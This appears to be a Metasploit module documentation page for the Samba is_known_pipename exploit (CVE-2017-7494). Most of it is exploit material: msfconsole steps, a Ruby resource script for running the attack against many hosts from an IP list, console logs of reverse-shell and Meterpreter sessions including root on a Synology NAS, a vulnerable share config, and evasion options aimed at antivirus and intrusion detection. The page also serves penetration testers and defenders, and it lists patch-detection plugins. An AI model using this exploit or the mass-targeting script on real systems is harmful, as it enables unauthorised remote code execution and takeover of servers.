Samba is_known_pipename() Arbitrary Module Load - Metasploit
This page contains detailed information about how to use the exploit/linux/samba/is_known_pipename metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Samba is_known_pipename() Arbitrary Module Load
Module: exploit/linux/samba/is_known_pipename
Source code: modules/exploits/linux/samba/is_known_pipename.rb
Disclosure date: 2017-03-24
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): -
Supported platform(s): Linux
Target service / protocol: microsoft-ds, netbios-ssn
Target network port(s): 139, 445
List of CVEs: CVE-2017-7494
This module triggers an arbitrary shared library load vulnerability in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module requires valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder. In some cases, anonymous access combined with common filesystem locations can be used to automatically exploit this vulnerability.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Basic Usage
Using is_known_pipename against a single host
Normally, you can use exploit/linux/samba/is_known_pipename this way:
msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > show targets
... a list of targets ...
msf exploit(is_known_pipename) > set TARGET target-id
msf exploit(is_known_pipename) > show options
... show and set options ...
msf exploit(is_known_pipename) > exploit
Using is_known_pipename against multiple hosts
But it looks like this is a remote exploit module, which means you can also engage multiple hosts.
First, create a list of IPs you wish to exploit with this module. One IP per line.
Second, set up a background payload listener. This payload should be the same as the one your is_known_pipename will be using:
- Do:
use exploit/multi/handler
- Do:
set PAYLOAD [payload]
- Set other options required by the payload
- Do:
set EXITONSESSION false
- Do:
run -j
At this point, you should have a payload listening.
Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:
<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'
File.open(ip_list, 'rb').each_line do |ip|
print_status("Trying against #{ip}")
run_single("use exploit/linux/samba/is_known_pipename")
run_single("set RHOST #{ip}")
run_single("set DisablePayloadHandler true")
#
# Set a payload that's the same as the handler.
# You might also need to add more run_single commands to configure other
# payload options.
#
run_single("set PAYLOAD [payload name]")
run_single("run")
end
</ruby>
Next, run the resource script in the console:
msf > resource [path-to-resource-script]
And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80
RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
This module exploits Samba from versions 3.5.0-4.4.14, 4.5.10, and 4.6.4 by loading a malicious shared library. Samba's download archives are here. There are some requirements for this exploit to be successful:
- Valid credentials
- Writeable folder in an accessible share
- Server-side path of the writeable folder
However, in some cases anonymous access with common filesystem locations can be used to automate exploitation.
A vulnerable Samba config may have a share similar to the following in smb.conf
. This is a setup for 'easy' exploitation
where no SMB options are required to be set:
[exploitable]
comment = CVE-2017-7494
path = /tmp
writable = yes
browseable = yes
guest ok = yes
Verified on:
- Synology DS412+ DSM 6.1.1-15101 Update 2 (Samba 4.4.9)
- Synology DS412+ DSM 6.1.1-15101 Update 3 (Samba 4.4.9)
- Synology DS1512+ DSM 6.1.1-15101 Update 2 (Samba 4.4.9)
- Synology DS1512+ DSM 6.1.1-15101 Update 3 (Samba 4.4.9)
- Synology DS2415+ DSM 6.1-15047 (Samba 4.3.11)
- Ubuntu 14.04.5 x64 (Samba 4.3.9)
- Ubuntu 15.04 (Samba 4.1.13)
- Ubuntu 16.04 (Samba 4.3.11)
- 1:4.3.11+dfsg-0ubuntu0.16.04.3 and older are vulnerable, fixed in 2:4.3.11+dfsg-0ubuntu0.16.04.7
- Fedora 24 (Samba 4.4.13)
Currently not working against:
- QNAP NAS Samba 4.4.9 on armv71
- WD MyClous NAS Samba 4.0.0rc5 armv71
SELinux
Fedora (and possibly Redhat) are not exploitable in their default installation. SELinux must be adjusted to allow nmbd to use net_admin, and smbd to exec the payload.
echo -ne "type=AVC msg=audit(1495745298.086:334): avc: denied { execstack } for pid=2365 comm="smbd" scontext=system_u:system_r:smbd_t:s0 tcontext=system_u:system_r:smbd_t:s0 tclass=process permissive=0\ntype=AVC msg=audit(1495717997.099:267): avc: denied { net_admin } for pid=959 comm="nmbd" capability=12 scontext=system_u:system_r:nmbd_t:s0 tcontext=system_u:system_r:nmbd_t:s0 tclass=capability permissive=0\ntype=AVC msg=audit(1495745002.690:308): avc: denied { execmem } for pid=1830 comm="smbd" scontext=system_u:system_r:smbd_t:s0 tcontext=system_u:system_r:smbd_t:s0 tclass=process permissive=0\ntype=AVC msg=audit(1495745183.319:331): avc: denied { execute } for pid=2313 comm="smbd" path="/tmp/ucFtDpZI.so" dev="tmpfs" ino=27436 scontext=system_u:system_r:smbd_t:s0 tcontext=system_u:object_r:smbd_tmp_t:s0 tclass=file permissive=0" | audit2allow -M cve-2017-7494; semodule -X 300 -i cve-2017-7494.pp
Verification Steps
- Start msfconsole
- Do:
use exploit/linux/samba/is_known_pipename
- Do:
set rhost [ip]
- Do:
set target [target #]
- Do:
exploit
Options
SMB_SHARE_NAME
The name of the SMB share containing a writeable directory. Shares are automatically scanned for, and if this variable is non-blank, it will be preferred.
SMB_SHARE_BASE
The remote filesystem path correlating with the SMB share name. This value is preferred, but other values are brute forced including:
- /volume1
- /volume2
- /volume3
- /shared
- /mnt
- /mnt/usb
- /media
- /mnt/media
- /var/samba
- /tmp/home/home/shared
SMB_FOLDER
The directory to use within the writeable SMB share. Writable directories are automatically scanned for, and if this variable is non-blank, it will be preferred.
Scenarios
Synology DS412+ w/ INTEL Atom D2700 on DSM 6.1.1-15101 Update 2
msf exploit(is_known_pipename) > exploit
[*] Started reverse TCP handler on 1.2.3.117:4444
[*] 1.2.3.119:445 - Using location \\1.2.3.119\ESX\ for the path
[*] 1.2.3.119:445 - Payload is stored in //1.2.3.119/ESX/ as eePUbtdw.so
[*] 1.2.3.119:445 - Trying location /volume1/eePUbtdw.so...
[-] 1.2.3.119:445 - Probe: /volume1/eePUbtdw.so: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
[*] 1.2.3.119:445 - Trying location /volume1/ESX/eePUbtdw.so...
[*] Command shell session 1 opened (1.2.3.117:4444 -> 1.2.3.119:34366) at 2017-05-24 21:12:07 -0400
id
uid=0(root) gid=0(root) groups=0(root),100(users)
uname -a
Linux synologyNAS 3.10.102 #15101 SMP Fri May 5 12:01:38 CST 2017 x86_64 GNU/Linux synology_cedarview_412+
Ubuntu 16.04
msf exploit(is_known_pipename) > exploit
[*] Started reverse TCP handler on 192.168.0.3:4444
[*] 192.168.0.3:445 - Using location \\192.168.0.3\yarp\h for the path
[*] 192.168.0.3:445 - Payload is stored in //192.168.0.3/yarp/h as GTithXJz.so
[*] 192.168.0.3:445 - Trying location /tmp/yarp/h/GTithXJz.so...
[*] Command shell session 6 opened (192.168.0.3:4444 -> 192.168.0.3:45076) at 2017-05-24 19:41:40 -0500
id
uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)
Go back to menu.
Msfconsole Usage
Here is how the linux/samba/is_known_pipename exploit module looks in the msfconsole:
msf6 > use exploit/linux/samba/is_known_pipename
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(linux/samba/is_known_pipename) > show info
Name: Samba is_known_pipename() Arbitrary Module Load
Module: exploit/linux/samba/is_known_pipename
Platform: Linux
Arch:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2017-03-24
Provided by:
steelo <[email protected]>
hdm <[email protected]>
bcoles <[email protected]>
Available targets:
Id Name
-- ----
0 Automatic (Interact)
1 Automatic (Command)
2 Linux x86
3 Linux x86_64
4 Linux ARM (LE)
5 Linux ARM64
6 Linux MIPS
7 Linux MIPSLE
8 Linux MIPS64
9 Linux MIPS64LE
10 Linux PPC
11 Linux PPC64
12 Linux PPC64 (LE)
13 Linux SPARC
14 Linux SPARC64
15 Linux s390x
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Payload information:
Space: 9000
Description:
This module triggers an arbitrary shared library load vulnerability
in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module
requires valid credentials, a writeable folder in an accessible
share, and knowledge of the server-side path of the writeable
folder. In some cases, anonymous access combined with common
filesystem locations can be used to automatically exploit this
vulnerability.
References:
https://nvd.nist.gov/vuln/detail/CVE-2017-7494
https://www.samba.org/samba/security/CVE-2017-7494.html
Module Options
This is a complete list of options available in the linux/samba/is_known_pipename exploit:
msf6 exploit(linux/samba/is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic (Interact)
Advanced Options
Here is a complete list of advanced options supported by the linux/samba/is_known_pipename exploit:
msf6 exploit(linux/samba/is_known_pipename) > show advanced
Module advanced options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
ContextInformationFile no The information file that contains context information
DCERPC::ReadTimeout 10 yes The number of seconds to wait for DCERPC responses
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
NTLM::SendLM true yes Always send the LANMAN response (except when NTLMv2_session is specified)
NTLM::SendNTLM true yes Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
NTLM::SendSPN true yes Send an avp of type SPN in the ntlmv2 client blob, this allows authentication on Windows 7+/Server 2008 R2+ when SPN is required
NTLM::UseLMKey false yes Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
NTLM::UseNTLM2_session true yes Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
NTLM::UseNTLMv2 true yes Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SMB::AlwaysEncrypt true yes Enforces encryption even if the server does not require it (SMB3.x only). Note that when it is set to false, the SMB client will still encrypt the communication if the server requires it
SMB::ChunkSize 500 yes The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing
SMB::Native_LM Windows 2000 5.0 yes The Native LM to send during authentication
SMB::Native_OS Windows 2000 2195 yes The Native OS to send during authentication
SMB::ProtocolVersion 1,2,3 yes One or a list of coma-separated SMB protocol versions to negotiate (e.g. "1" or "1,2" or "2,3,1")
SMB::VerifySignature false yes Enforces client-side verification of server response signatures
SMBDirect true no The target port is a raw SMB service (not NetBIOS)
SMBDomain . no The Windows domain to use for authentication
SMBName *SMBSERVER yes The NetBIOS hostname (required for port 139 connections)
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
CreateSession true no Create a new session for every successful login
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the linux/samba/is_known_pipename module can exploit:
msf6 exploit(linux/samba/is_known_pipename) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic (Interact)
1 Automatic (Command)
2 Linux x86
3 Linux x86_64
4 Linux ARM (LE)
5 Linux ARM64
6 Linux MIPS
7 Linux MIPSLE
8 Linux MIPS64
9 Linux MIPS64LE
10 Linux PPC
11 Linux PPC64
12 Linux PPC64 (LE)
13 Linux SPARC
14 Linux SPARC64
15 Linux s390x
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the linux/samba/is_known_pipename exploit:
msf6 exploit(linux/samba/is_known_pipename) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/interact normal No Unix Command, Interact with Established Connection
Evasion Options
Here is the full list of possible evasion options supported by the linux/samba/is_known_pipename exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(linux/samba/is_known_pipename) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
DCERPC::fake_bind_multi false no Use multi-context bind calls
DCERPC::fake_bind_multi_append 0 no Set the number of UUIDs to append the target
DCERPC::fake_bind_multi_prepend 0 no Set the number of UUIDs to prepend before the target
DCERPC::max_frag_size 4096 yes Set the DCERPC packet fragmentation size
DCERPC::smb_pipeio rw no Use a different delivery method for accessing named pipes (Accepted: rw, trans)
SMB::obscure_trans_pipe_level 0 yes Obscure PIPE string in TransNamedPipe (level 0-3)
SMB::pad_data_level 0 yes Place extra padding between headers and data (level 0-3)
SMB::pad_file_level 0 yes Obscure path names used in open/create (level 0-3)
SMB::pipe_evasion false yes Enable segmented read/writes for SMB Pipes
SMB::pipe_read_max_size 1024 yes Maximum buffer size for pipe reads
SMB::pipe_read_min_size 1 yes Minimum buffer size for pipe reads
SMB::pipe_write_max_size 1024 yes Maximum buffer size for pipe writes
SMB::pipe_write_min_size 1 yes Minimum buffer size for pipe writes
TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client
- Enum <SHARE>: <E>
- Write <SHARE><FILENAME>: <E>
- No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER
- No matching target
- Write <SHARE><FILENAME>: <E>
- >> Failed to load <E.ERROR_NAME>
- >> Failed to load <E.STATUS_CODE.NAME>
- Error: The interactive target is chosen (0) but PAYLOAD is not set to cmd/unix/interact
- Please set PAYLOAD to cmd/unix/interact and try this again
- Invalid payload chosen for the interactive target
- Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact
- Please set a valid PAYLOAD and try this again
- Invalid payload chosen for the non-interactive target
- does not appear to be Samba: <OS> / <NATIVE_LM>
- Samba version <SAMBA_VERSION.TO_S> found, but no writeable share has been identified
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client
Here is a relevant code snippet related to the "Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client" error message:
122: end
123:
124: # List all top-level directories within a given share
125: def enumerate_directories(share)
126: begin
127: vprint_status('Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client')
128: connect(versions: [1])
129: smb_login
130: self.simple.connect("\\\\#{rhost}\\#{share}")
131: stuff = self.simple.client.find_first("\\*")
132: directories = [""]
Enum <SHARE>: <E>
Here is a relevant code snippet related to the "Enum <SHARE>: <E>" error message:
137: end
138:
139: return directories
140:
141: rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
142: vprint_error("Enum #{share}: #{e}")
143: return nil
144:
145: ensure
146: simple.disconnect("\\\\#{rhost}\\#{share}")
147: smb_connect
Write <SHARE><FILENAME>: <E>
Here is a relevant code snippet related to the "Write <SHARE><FILENAME>: <E>" error message:
162:
163: simple.delete(filename)
164: return true
165:
166: rescue ::Rex::Proto::SMB::Exceptions::ErrorCode, RubySMB::Error::RubySMBError => e
167: vprint_error("Write #{share}#{filename}: #{e}")
168: return false
169:
170: ensure
171: simple.disconnect("\\\\#{rhost}\\#{share}")
172: end
No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER
Here is a relevant code snippet related to the "No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER" error message:
215:
216: # Locate a writeable share
217: def find_writeable
218: find_writeable_share_path
219: unless @share && @path
220: print_error("No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER")
221: fail_with(Failure::NoTarget, "No matching target")
222: end
223: print_status("Using location \\\\#{rhost}\\#{@share}\\#{@path} for the path")
224: end
225:
No matching target
Here is a relevant code snippet related to the "No matching target" error message:
216: # Locate a writeable share
217: def find_writeable
218: find_writeable_share_path
219: unless @share && @path
220: print_error("No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER")
221: fail_with(Failure::NoTarget, "No matching target")
222: end
223: print_status("Using location \\\\#{rhost}\\#{@share}\\#{@path} for the path")
224: end
225:
226: # Store the wrapped payload into the writeable share
Write <SHARE><FILENAME>: <E>
Here is a relevant code snippet related to the "Write <SHARE><FILENAME>: <E>" error message:
236: wfd.close
237:
238: @payload_name = random_filename
239:
240: rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
241: print_error("Write #{@share}#{filename}: #{e}")
242: return false
243:
244: ensure
245: simple.disconnect("\\\\#{rhost}\\#{@share}")
246: end
>> Failed to load <E.ERROR_NAME>
Here is a relevant code snippet related to the ">> Failed to load <E.ERROR_NAME>" error message:
274: # Look for STATUS_OBJECT_PATH_INVALID indicating our interact payload loaded
275: if e.error_code == 0xc0000039
276: pwn
277: return true
278: else
279: print_error(" >> Failed to load #{e.error_name}")
280: end
281: rescue RubySMB::Error::UnexpectedStatusCode, RubySMB::Error::InvalidPacket => e
282: if e.status_code == ::WindowsError::NTStatus::STATUS_OBJECT_PATH_INVALID
283: pwn
284: return true
>> Failed to load <E.STATUS_CODE.NAME>
Here is a relevant code snippet related to the ">> Failed to load <E.STATUS_CODE.NAME>" error message:
281: rescue RubySMB::Error::UnexpectedStatusCode, RubySMB::Error::InvalidPacket => e
282: if e.status_code == ::WindowsError::NTStatus::STATUS_OBJECT_PATH_INVALID
283: pwn
284: return true
285: else
286: print_error(" >> Failed to load #{e.status_code.name}")
287: end
288: end
289:
290: disconnect
291:
Error: The interactive target is chosen (0) but PAYLOAD is not set to cmd/unix/interact
Here is a relevant code snippet related to the "Error: The interactive target is chosen (0) but PAYLOAD is not set to cmd/unix/interact" error message:
372: end
373:
374: # Verify that the payload settings make sense
375: def sanity_check
376: if target['Interact'] && datastore['PAYLOAD'] != "cmd/unix/interact"
377: print_error("Error: The interactive target is chosen (0) but PAYLOAD is not set to cmd/unix/interact")
378: print_error(" Please set PAYLOAD to cmd/unix/interact and try this again")
379: print_error("")
380: fail_with(Failure::NoTarget, "Invalid payload chosen for the interactive target")
381: end
382:
Please set PAYLOAD to cmd/unix/interact and try this again
Here is a relevant code snippet related to the "Please set PAYLOAD to cmd/unix/interact and try this again" error message:
373:
374: # Verify that the payload settings make sense
375: def sanity_check
376: if target['Interact'] && datastore['PAYLOAD'] != "cmd/unix/interact"
377: print_error("Error: The interactive target is chosen (0) but PAYLOAD is not set to cmd/unix/interact")
378: print_error(" Please set PAYLOAD to cmd/unix/interact and try this again")
379: print_error("")
380: fail_with(Failure::NoTarget, "Invalid payload chosen for the interactive target")
381: end
382:
383: if ! target['Interact'] && datastore['PAYLOAD'] == "cmd/unix/interact"
Invalid payload chosen for the interactive target
Here is a relevant code snippet related to the "Invalid payload chosen for the interactive target" error message:
375: def sanity_check
376: if target['Interact'] && datastore['PAYLOAD'] != "cmd/unix/interact"
377: print_error("Error: The interactive target is chosen (0) but PAYLOAD is not set to cmd/unix/interact")
378: print_error(" Please set PAYLOAD to cmd/unix/interact and try this again")
379: print_error("")
380: fail_with(Failure::NoTarget, "Invalid payload chosen for the interactive target")
381: end
382:
383: if ! target['Interact'] && datastore['PAYLOAD'] == "cmd/unix/interact"
384: print_error("Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact")
385: print_error(" Please set a valid PAYLOAD and try this again")
Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact
Here is a relevant code snippet related to the "Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact" error message:
379: print_error("")
380: fail_with(Failure::NoTarget, "Invalid payload chosen for the interactive target")
381: end
382:
383: if ! target['Interact'] && datastore['PAYLOAD'] == "cmd/unix/interact"
384: print_error("Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact")
385: print_error(" Please set a valid PAYLOAD and try this again")
386: print_error("")
387: fail_with(Failure::NoTarget, "Invalid payload chosen for the non-interactive target")
388: end
389: end
Please set a valid PAYLOAD and try this again
Here is a relevant code snippet related to the "Please set a valid PAYLOAD and try this again" error message:
380: fail_with(Failure::NoTarget, "Invalid payload chosen for the interactive target")
381: end
382:
383: if ! target['Interact'] && datastore['PAYLOAD'] == "cmd/unix/interact"
384: print_error("Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact")
385: print_error(" Please set a valid PAYLOAD and try this again")
386: print_error("")
387: fail_with(Failure::NoTarget, "Invalid payload chosen for the non-interactive target")
388: end
389: end
390:
Invalid payload chosen for the non-interactive target
Here is a relevant code snippet related to the "Invalid payload chosen for the non-interactive target" error message:
382:
383: if ! target['Interact'] && datastore['PAYLOAD'] == "cmd/unix/interact"
384: print_error("Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact")
385: print_error(" Please set a valid PAYLOAD and try this again")
386: print_error("")
387: fail_with(Failure::NoTarget, "Invalid payload chosen for the non-interactive target")
388: end
389: end
390:
391: # Shorthand for connect and login
392: def smb_connect
does not appear to be Samba: <OS> / <NATIVE_LM>
Here is a relevant code snippet related to the "does not appear to be Samba: <OS> / <NATIVE_LM>" error message:
442: # A version-based vulnerability check for Samba
443: def check
444: res = smb_fingerprint
445:
446: unless res['native_lm'] =~ /Samba ([\d\.]+)/
447: print_error("does not appear to be Samba: #{res['os']} / #{res['native_lm']}")
448: return CheckCode::Safe
449: end
450:
451: samba_version = Rex::Version.new($1.gsub(/\.$/, ''))
452:
Samba version <SAMBA_VERSION.TO_S> found, but no writeable share has been identified
Here is a relevant code snippet related to the "Samba version <SAMBA_VERSION.TO_S> found, but no writeable share has been identified" error message:
477: smb_connect
478: find_writeable_share_path
479: disconnect
480:
481: if @share.to_s.length == 0
482: print_status("Samba version #{samba_version.to_s} found, but no writeable share has been identified")
483: return CheckCode::Detected
484: end
485:
486: print_good("Samba version #{samba_version.to_s} found with writeable share '#{@share}'")
487: return CheckCode::Appears
Go back to menu.
Related Pull Requests
- #14769 Merged Pull Request: Handle nil versions in preparation for rubygems 4
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #14035 Merged Pull Request: Fix is_known_pipename module
- #13417 Merged Pull Request: SMBv3 integration with Framework
- #11234 Merged Pull Request: revisionism
- #10505 Merged Pull Request: Add post authentication information in modules
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8467 Merged Pull Request: Samba CVE-2017-7494 Improvements
- #8450 Merged Pull Request: First crack at Samba CVE-2017-7494
References
See Also
Check also the following modules related to this module:
- auxiliary/admin/smb/samba_symlink_traversal
- auxiliary/dos/samba/lsa_addprivs_heap
- auxiliary/dos/samba/lsa_transnames_heap
- auxiliary/dos/samba/read_nttrans_ea_list
- exploit/freebsd/samba/trans2open
- exploit/linux/samba/chain_reply
- exploit/linux/samba/lsa_transnames_heap
- exploit/linux/samba/setinfopolicy_heap
- exploit/linux/samba/trans2open
- exploit/multi/samba/nttrans
- exploit/multi/samba/usermap_script
- exploit/osx/samba/lsa_transnames_heap
- exploit/osx/samba/trans2open
- exploit/solaris/samba/lsa_transnames_heap
- exploit/solaris/samba/trans2open
- exploit/windows/http/sambar6_search_results
- exploit/linux/ssh/ceragon_fibeair_known_privkey
- exploit/linux/ssh/exagrid_known_privkey
- exploit/linux/ssh/f5_bigip_known_privkey
- exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey
- exploit/linux/ssh/quantum_dxi_known_privkey
- exploit/linux/ssh/vmware_vdp_known_privkey
Related Nessus plugins:
- Samba 3.5.x < 4.4 / 4.4.x < 4.4.14 / 4.5.x < 4.5.10 / 4.6.x < 4.6.4 Shared Library RCE
- Slackware 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : samba (SSA:2017-144-01) (SambaCry)
- Debian DLA-951-1 : samba security update (SambaCry)
- Debian DSA-3860-1 : samba - security update (SambaCry)
- FreeBSD : samba -- remote code execution vulnerability (6f4d96c0-4062-11e7-b291-b499baebfeaf) (SambaCry)
- openSUSE Security Update : samba (openSUSE-2017-613) (SambaCry)
- Oracle Linux 6 / 7 : samba (ELSA-2017-1270) (SambaCry)
- Oracle Linux 6 : samba4 (ELSA-2017-1271) (SambaCry)
- RHEL 6 / 7 : samba (RHSA-2017:1270) (SambaCry)
- RHEL 6 : samba4 (RHSA-2017:1271) (SambaCry)
Authors
- steelo <knownsteelo[at]gmail.com>
- hdm
- bcoles
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.